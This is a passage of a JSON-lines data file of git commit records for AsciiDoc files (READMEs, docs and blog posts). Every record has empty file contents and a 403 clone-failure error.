link\n","repos":"beni55\/vim-rfc,andreaswachowski\/vim-rfc,mhinz\/vim-rfc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mhinz\/vim-rfc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed5261636883c69b1c7d988f5360bb74379b0a50","subject":"Python note: One way to control relative import","message":"Python note: One way to control relative import\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"6f2ba4e2122166e1d069b6250934c1ec4a2e714a","subject":"Added README","message":"Added README\n","repos":"hierynomus\/asn-one","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hierynomus\/asn-one.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca54013bf117f48fc234ebb3dd0e3d07e6cd060c","subject":"docker command example","message":"docker command example\n","repos":"adoc-editor\/editor-backend","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e081b6f9fc68ec15f302a33f4f774fe62a8c879","subject":"Add README","message":"Add README\n","repos":"l1048576\/fbx_direct","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/l1048576\/fbx_direct.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"86b365a0fe1182aaafe7dd0b8d91013403fb21da","subject":"README: \u201csimple\u201d \u2192 \u201cless complex\u201d","message":"README: \u201csimple\u201d \u2192 \u201cless complex\u201d\n\nSome people complain that vanilla maps aren\u2019t necessarily simple.\n","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"3dfb15149ebff3c8fc56031218857e2b04cc9f62","subject":"First version of the README","message":"First version of the README\n","repos":"trebuh\/online-server-watcher","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/trebuh\/online-server-watcher.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12fa89672458de9fc4dc4f712dd62caa1d2582ce","subject":"chore: add badges","message":"chore: add badges\n","repos":"gravitee-io\/gravitee-policy-authentication","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-authentication.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6bc9d992b513f49d095cad8ac04ead01d63928da","subject":"Add a draft of a README","message":"Add a draft of a README\n\n(yes, _still_ recuperating from the flu)\n","repos":"cyChop\/beverages-js,cyChop\/beverages-js,cyChop\/teas-js,cyChop\/beverages-js,cyChop\/teas-js","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cyChop\/beverages-js.git\/': The requested URL returned error: 403\n","license":"unknown","lang":"AsciiDoc"} {"commit":"37ccc80f18a6e3378fd1eb63b7dec6481c946831","subject":"Added links","message":"Added links\n","repos":"skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skaterkamp\/szoo-faces.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"086a10357c6f885f657d07855cb90c838ae5f1b9","subject":"updating readme","message":"updating readme\n","repos":"bbyers-pivotal\/gnomes-demo,reshmik\/gnomes-demo,viniciusccarvalho\/gnomes-demo,viniciusccarvalho\/gnomes-demo,agallego-pivotal\/gnomes-demo,reshmik\/gnomes-demo,bbyers-pivotal\/gnomes-demo,agallego-pivotal\/gnomes-demo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bbyers-pivotal\/gnomes-demo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"31aab41d33a469c0273b96adc3005c1efa3c4505","subject":"Add readme","message":"Add readme\n\n[skip ci]\n","repos":"lassik\/extract,lassik\/extract","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lassik\/extract.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"8c84be5f9217a58e60abea9adfeae171df2ebdfc","subject":"Updated documentation","message":"Updated documentation","repos":"javaslang\/javaslang-circuitbreaker,drmaas\/resilience4j,drmaas\/resilience4j,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,storozhukBM\/javaslang-circuitbreaker,goldobin\/resilience4j,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8,mehtabsinghmann\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1a496d80596b757251c64a15f518c9e900818aa6","subject":"Add README.adoc.","message":"Add README.adoc.\n","repos":"mitclap\/android,mitclap\/android","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mitclap\/android.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d0cdf4ce7de32a1d2507311fe26f9720375716ce","subject":"Added coveralls badge to readme","message":"Added coveralls badge to 
readme","repos":"oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c06514bb95439d757b74267278de150f4d97b469","subject":"Updated documentation","message":"Updated documentation","repos":"goldobin\/resilience4j,drmaas\/resilience4j,RobWin\/circuitbreaker-java8,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bad02578bfc43a55f78577263da00cdb6662011d","subject":"add diagram overview","message":"add diagram overview\n","repos":"adoc-editor\/editor-backend","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"15b6c5af434a2de1348fa94ec58997f5d0fe9ff5","subject":"Document the dynamic DNS update with dedicated LB","message":"Document the dynamic DNS update with dedicated LB\n","repos":"markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0fb10b882e1386b5a17752dab6bf4a1e0ad26499","subject":"Added readme. Added Gitter badge. Signed-off-by:Ondrej Mihalyi <ondrej.mihalyi@gmail.com>","message":"Added readme. 
Added Gitter badge.\nSigned-off-by:Ondrej Mihalyi <0548979e2ac15cccb3e6ca41d0de8b4627382aff@gmail.com>","repos":"jbosstm\/microprofile-sandbox","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosstm\/microprofile-sandbox.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7bd68cee47a2b01e85416c08b35220adc290a67","subject":"minor fixes for README.adoc","message":"minor fixes for README.adoc\n","repos":"markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c2253ae7b747b4deaff8f8bb8fcdfa2e2f6f788","subject":"Create README.adoc","message":"Create README.adoc","repos":"fifilyu\/openssl-cplueplus-demo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fifilyu\/openssl-cplueplus-demo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ac142b8b2cd873b865812e8c89732ddd5e5dedd","subject":"Update 2016-05-13-Engineer-Career-Path.adoc","message":"Update 2016-05-13-Engineer-Career-Path.adoc\n\nAdd Image","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34e4bf1873bc495f50c0fa940c9dee7a05e877f2","subject":"Update 2017-05-31-Naming-Conventions.adoc","message":"Update 2017-05-31-Naming-Conventions.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e0a76fdb22cfe2e629eac70838aa4ff559a3451","subject":"Update 2017-06-30-C-S-S-Because-tuyu.adoc","message":"Update 2017-06-30-C-S-S-Because-tuyu.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-30-C-S-S-Because-tuyu.adoc","new_file":"_posts\/2017-06-30-C-S-S-Because-tuyu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6314995119072ef988e15dc915b0eac58533b063","subject":"Add tutorial","message":"Add 
tutorial\n\nResolves #163.\n","repos":"gdamore\/tcell,gdamore\/tcell","old_file":"TUTORIAL.adoc","new_file":"TUTORIAL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gdamore\/tcell.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b010b3907a7ac0da4c99343d51c71f5fb5a8602","subject":"y2b create post The YouTube Subscriber Counter","message":"y2b create post The YouTube Subscriber Counter","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-29-The-YouTube-Subscriber-Counter.adoc","new_file":"_posts\/2017-03-29-The-YouTube-Subscriber-Counter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"552725c79c20cc927ce711ff1bc86a39a116696f","subject":"Update 2017-07-07-Thanks-Kurt-for-the-rememories.adoc","message":"Update 2017-07-07-Thanks-Kurt-for-the-rememories.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-07-07-Thanks-Kurt-for-the-rememories.adoc","new_file":"_posts\/2017-07-07-Thanks-Kurt-for-the-rememories.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9bb947375623298fe8fd377798a69f3573c2034","subject":"Initial usage notes","message":"Initial usage notes\n","repos":"ECP-CANDLE\/Database,ECP-CANDLE\/Database","old_file":"plots\/README.adoc","new_file":"plots\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Database.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"330016ca68a288191780f7ba02a1ec5ec42f5612","subject":"Update 2015-05-17-Uber-das-Vergessen.adoc","message":"Update 2015-05-17-Uber-das-Vergessen.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-17-Uber-das-Vergessen.adoc","new_file":"_posts\/2015-05-17-Uber-das-Vergessen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6e158b02f27c766102178af9a460e24e2d29298","subject":"Update 2015-10-02-When-Epiales-Calls.adoc","message":"Update 2015-10-02-When-Epiales-Calls.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be63c1c6df800c040b9d54902b3140bd3085a32c","subject":"Update 2015-05-09-BurpSentinel-Payloads.adoc","message":"Update 
2015-05-09-BurpSentinel-Payloads.adoc","repos":"dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io","old_file":"_posts\/2015-05-09-BurpSentinel-Payloads.adoc","new_file":"_posts\/2015-05-09-BurpSentinel-Payloads.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dobin\/dobin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8195846c06dd3b3f0983f78b4de20320bf9075bc","subject":"Update 2015-06-05-Ma-journee-au-web2day.adoc","message":"Update 2015-06-05-Ma-journee-au-web2day.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-05-Ma-journee-au-web2day.adoc","new_file":"_posts\/2015-06-05-Ma-journee-au-web2day.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"604a9e34e2dc8d5f4025496f316e345e1b4e1c12","subject":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","message":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"546bc834cb83ac41ec83b9e7fddcd56fda8c2ce3","subject":"Update 2017-09-17-mixed-content-checker.adoc","message":"Update 2017-09-17-mixed-content-checker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f83174042ba7ee95ba5df197aa9b8d49b6492c59","subject":"CL note: read binary","message":"CL note: read binary\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"127764faa6d889d93a2d8efdfde75312cc290366","subject":"Grafana doc update: (#281)","message":"Grafana doc update: (#281)\n\n* Grafana doc update:\r\n\r\n- fix wrong path for plugin installation\r\n- add details about access mode\r\n- add details about tenants\r\n\r\n* Use brand names Hawkular Metrics \/ 
Services\r\n","repos":"objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/hawkular-clients\/grafana\/docs\/quickstart-guide\/index.adoc","new_file":"src\/main\/jbake\/content\/hawkular-clients\/grafana\/docs\/quickstart-guide\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9f8d5d76aa76fa8cb8fb0583301b974964facd8","subject":"Update 2016-10-05-15072015-Moteur.adoc","message":"Update 2016-10-05-15072015-Moteur.adoc","repos":"3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io","old_file":"_posts\/2016-10-05-15072015-Moteur.adoc","new_file":"_posts\/2016-10-05-15072015-Moteur.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/3991\/3991.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ce4c99299fb963cf37daf2c6eabed01aa2c8fe2","subject":"KUDU-654 Kudu style guide","message":"KUDU-654 Kudu style guide\n\nChange-Id: If891b9e1e09addb6f091ba0b6c07e6cd822d8bba\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/7009\nTested-by: jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu","old_file":"docs\/style_guide.adoc","new_file":"docs\/style_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ce9443d79cc541253930e7a7c917686cb401326c","subject":"Update 2018-01-30-The-post-Modern-Pilgrimage.adoc","message":"Update 
2018-01-30-The-post-Modern-Pilgrimage.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2018-01-30-The-post-Modern-Pilgrimage.adoc","new_file":"_posts\/2018-01-30-The-post-Modern-Pilgrimage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21e69afe893789e76a6f9484a965b949d3b7926c","subject":"cookbook: removed duplicate links","message":"cookbook: removed duplicate links\n\nnew pointer is under Python API section instead of general\n\nSigned-off-by: imarom <4fa0e965a175bd1cef6459ed7c388bf7ff953a09@cisco.com>\n","repos":"kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"doc\/trex_index.asciidoc","new_file":"doc\/trex_index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e8ae670840bb53cb3f925a57bdfcb21f41173cd2","subject":"Add early draft of CSS selector reference docs.","message":"Add early draft of CSS selector reference docs.\n","repos":"lzpfmh\/framework-2,lift\/framework,sortable\/framework,lift\/framework,lzpfmh\/framework-2,lzpfmh\/framework-2,listatree\/framework,lzpfmh\/framework-2,listatree\/framework,sortable\/framework,lift\/framework,listatree\/framework,lift\/framework,sortable\/framework,sortable\/framework,listatree\/framework","old_file":"docs\/css-selectors.adoc","new_file":"docs\/css-selectors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/listatree\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57bf1d0d861b9610cd76934056b772642364c432","subject":"tutorials: initial import of getting_started","message":"tutorials: initial import of getting_started\n\nSigned-off-by: Pierre-Alexandre Meyer <ff019a5748a52b5641624af88a54a2f0e46a9fb5@mouraf.org>\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/getting_started.adoc","new_file":"userguide\/tutorials\/getting_started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8705ac6df687343cc0ae6ae5b03f1858705bf79b","subject":"Update 2017-04-27-My-first-post-in-github-blog-using-hubpress.adoc","message":"Update 2017-04-27-My-first-post-in-github-blog-using-hubpress.adoc","repos":"twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io","old_file":"_posts\/2017-04-27-My-first-post-in-github-blog-using-hubpress.adoc","new_file":"_posts\/2017-04-27-My-first-post-in-github-blog-using-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/twentyTwo\/twentyTwo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"ebdc346df571271f3edf373330008941c65e1d00","subject":"Update 2015-07-22-Li-Europan-lingues.adoc","message":"Update 2015-07-22-Li-Europan-lingues.adoc","repos":"fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io","old_file":"_posts\/2015-07-22-Li-Europan-lingues.adoc","new_file":"_posts\/2015-07-22-Li-Europan-lingues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fr-developer\/fr-developer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4bed4b1b50802051a9094ab186174f26d54a364c","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8464bf7492f068af319866632dcc02b1db7cd774","subject":"Update 2017-10-03-new-blog-is-online.adoc","message":"Update 2017-10-03-new-blog-is-online.adoc","repos":"laibaogo\/hubpress.io,laibaogo\/hubpress.io,laibaogo\/hubpress.io,laibaogo\/hubpress.io","old_file":"_posts\/2017-10-03-new-blog-is-online.adoc","new_file":"_posts\/2017-10-03-new-blog-is-online.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laibaogo\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"580f9f741acd68144de58f6f2605fa84f86e1e4e","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ff1f526ee203e4efa0b2976dc3770796380fa61","subject":"Update 2015-06-08-My-title-4.adoc","message":"Update 2015-06-08-My-title-4.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-08-My-title-4.adoc","new_file":"_posts\/2015-06-08-My-title-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26a88cbe035dc83c046f54171dfce9e7b3383eb9","subject":"Create file","message":"Create 
